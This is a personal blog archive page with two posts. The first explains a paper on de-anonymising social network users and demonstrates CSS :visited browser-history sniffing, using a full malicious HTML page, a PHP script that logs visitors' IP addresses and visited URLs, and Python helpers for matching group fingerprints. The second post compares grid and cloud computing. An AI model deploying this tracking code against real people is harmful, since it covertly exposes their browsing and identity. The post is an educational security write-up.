Nabeel's Blog: April 2011

Wednesday, April 27, 2011

De-anonymizing social network users

I recently read an interesting paper about de-anonymizing social network users that appeared in last year's S&P. The idea is quite simple: the groups a user belongs to act as a fingerprint of that user (a.k.a. the user's group fingerprint); in other words, the set of groups a user belongs to allows an attacker to identify the user uniquely. Most social networks let users join (or not join) groups. If an attacker can get hold of a user's group membership information from these social networks, the attacker can uniquely identify the user (e.g. associate an IP address with a specific user). How do they steal the group membership information? With another simple trick: they reuse an existing technique for stealing the user's browser history.
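As a rough sketch of the fingerprint idea (not the paper's actual implementation), the matching step can be thought of as a set intersection: keep only the users who are members of every group the victim appears to have visited. The `members` directory, the group names, and the user names below are all hypothetical, and the sketch assumes the attacker has already collected member lists for the groups of interest.

```python
from typing import Dict, Set


def candidates_for(visited_groups: Set[str], members: Dict[str, Set[str]]) -> Set[str]:
    """Return the users who belong to every visited group we have a member list for."""
    known = [members[g] for g in visited_groups if g in members]
    if not known:
        # No usable group information, so nobody can be singled out.
        return set()
    return set.intersection(*known)


# Hypothetical directory: group name -> set of member names.
members = {
    "chess-club": {"alice", "bob", "carol"},
    "hiking": {"bob", "carol", "dave"},
    "photography": {"carol", "erin"},
}

# One group leaves several candidates; three groups narrow it down.
print(sorted(candidates_for({"chess-club"}, members)))
print(sorted(candidates_for({"chess-club", "hiking", "photography"}, members)))
```

The more groups the attacker can confirm, the smaller the candidate set becomes, which is why the group list behaves like a fingerprint.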

I initially thought JavaScript had to be enabled in order to steal a user's browser history, but you are still not safe even if you disable JavaScript, so I was curious to find out how it is done without it. A simple CSS trick is enough to steal the browser history (an online example). The idea is quite simple. In your style sheet, you list the URLs you want to track and give each link's :visited rule a background image that is fetched from your server. Then you use some kind of social engineering trick to get the user to open your malicious page. To the user nothing looks wrong; it is an innocuous HTML page. But the browser applies the :visited rules to any listed links that are in its history, and for each of them it requests the corresponding background URL from the malicious server. The malicious server then knows which links the user visited.

For example, this is a simple malicious HTML page that I want to get a user to open:


<html>
<body>
<style>
span.s1 a:visited {
background:url(visited.php?t=http%3A//www.google.com);
}
span.s2 a:visited {
background:url(visited.php?t=http%3A//www.dailymirror.lk);
}
</style>

<span class="s1">
<a href="http://www.google.com">www.google.com</a>
</span>
<br/>
<span class="s2">
<a href="http://www.dailymirror.lk">www.dailymirror.lk</a>
</span>
</body>
</html>

And I have a small malicious PHP file, visited.php, which appends a line to a text file whenever the user has visited one of the listed links:

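<?php
// Address of the browser that requested the background image.
$client = $_SERVER['REMOTE_ADDR'];

// Ignore requests that do not carry the tracked URL.
if (isset($_GET['t'])) {
    $str = $client . " has accessed " . $_GET['t'] . "\n";
    // Append to the log; LOCK_EX keeps concurrent requests from interleaving.
    file_put_contents("history.txt", $str, FILE_APPEND | LOCK_EX);
}
?>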

The history.txt file then contains something like:
205.10.1.1 has accessed http://www.google.com
210.34.5.11 has accessed http://www.google.com
210.34.5.11 has accessed http://www.dailymirror.lk

You get the idea. It is quite simple to launch this attack.
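To turn such a log into something usable, the entries can be grouped per client address. The following is a minimal sketch, assuming the exact "<ip> has accessed <url>" line format shown above; the function name `visits_by_client` is made up for illustration.

```python
from collections import defaultdict
from typing import Dict, Iterable, Set

# Assumed separator, taken from the log format shown above.
SEPARATOR = " has accessed "


def visits_by_client(lines: Iterable[str]) -> Dict[str, Set[str]]:
    """Group logged URLs by client address, skipping lines that do not match."""
    visits = defaultdict(set)
    for line in lines:
        client, sep, url = line.strip().partition(SEPARATOR)
        if sep and url:
            visits[client].add(url)
    return dict(visits)


sample = [
    "205.10.1.1 has accessed http://www.google.com",
    "210.34.5.11 has accessed http://www.google.com",
    "210.34.5.11 has accessed http://www.dailymirror.lk",
]

for client, urls in visits_by_client(sample).items():
    print(client, sorted(urls))
```

With group pages as the tracked URLs, the set collected for one address is that visitor's group fingerprint.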

I found this plug-in from Stanford, which is said to protect your browser from visited-link-based attacks. (Update: this plug-in is no longer maintained; it only has an XPI for Firefox 2.0.)

Friday, April 15, 2011

Grid vs. Cloud computing

In today's group meeting, we were discussing the security issues in the cloud computing paradigm. At the end of the meeting, I was confused about the difference between grid and cloud computing. Do they both refer to the same thing? Are they different? Or do they have things in common? If it is the last case, what is common and what is different? So I decided to look for the answer.

I am not familiar with grid computing, but the 2008 paper by Ian Foster et al. titled "Cloud Computing and Grid Computing 360-Degree Compared" helped resolve some of the confusion I had. This blog post is based on the material in that paper.

The following diagram shows the big picture of grid vs. cloud computing.

The following discussion is based on projects such as TeraGrid (grid computing) vs. commercially available Amazon EC2, Microsoft Azure (cloud computing).

How are the resources distributed?
To me both are the same from a distributed systems point of view; both try to reduce computing cost by using a distributed cluster of computers. However, the main difference appears to be in how the two approaches work. It is safe to say that, from a user's point of view, cloud computing is a centralized model, whereas grid computing is a decentralized model in which the computation could occur over many administrative domains.

Who controls?
In cloud computing (at least from what I have seen so far), one party controls the cluster of computers, whereas in grid computing there is no single controller that can control all the nodes in the cluster. In other words, cloud computing allows a user/organization to build a virtual organization on a third-party infrastructure, whereas grid computing tries to build a collaborative virtual organization that does not belong to any single entity.

How does on-demand computation work?
Both have the notion of on-demand computation. However, grid computing is more of an incentive model (e.g. if you provide computation resources, you also get computation resources from others who have already joined the grid/cluster), whereas cloud computing has no notion of an incentive model. Cloud computing is more of a utility model, like electricity consumption, where you pay for what you use. One could argue that both have some kind of utility model: in grid computing you trade your idle computation cycles, unused space, etc. for other (same or different) resources available in the virtual network, and in cloud computing you trade your money for the resources available from a cloud provider.

I don't claim that the above description is fully correct. I may have looked at the topic from a narrow point of view. Please feel free to voice your opinion.